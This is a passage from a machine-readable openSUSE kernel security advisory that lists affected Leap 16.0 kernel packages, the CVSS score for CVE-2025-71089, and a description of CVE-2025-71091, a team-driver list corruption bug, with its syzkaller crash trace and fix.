"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
